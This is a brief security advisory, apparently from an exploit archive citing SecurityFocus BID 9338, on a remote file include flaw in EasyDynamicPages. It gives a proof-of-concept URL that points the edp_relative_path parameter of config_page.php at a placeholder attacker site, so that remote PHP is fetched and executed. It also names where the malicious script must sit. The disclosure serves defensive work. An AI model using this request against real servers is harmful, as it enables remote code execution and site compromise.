9 lines
No EOL
567 B
Text
9 lines
No EOL
567 B
Text
source: http://www.securityfocus.com/bid/9338/info
|
|
|
|
EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software.
|
|
|
|
http://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://[attacker's_site]/
|
|
|
|
The attacker must have a malicious script hosted at the following location:
|
|
|
|
http://[attacker's_site]/admin/site_settings.php |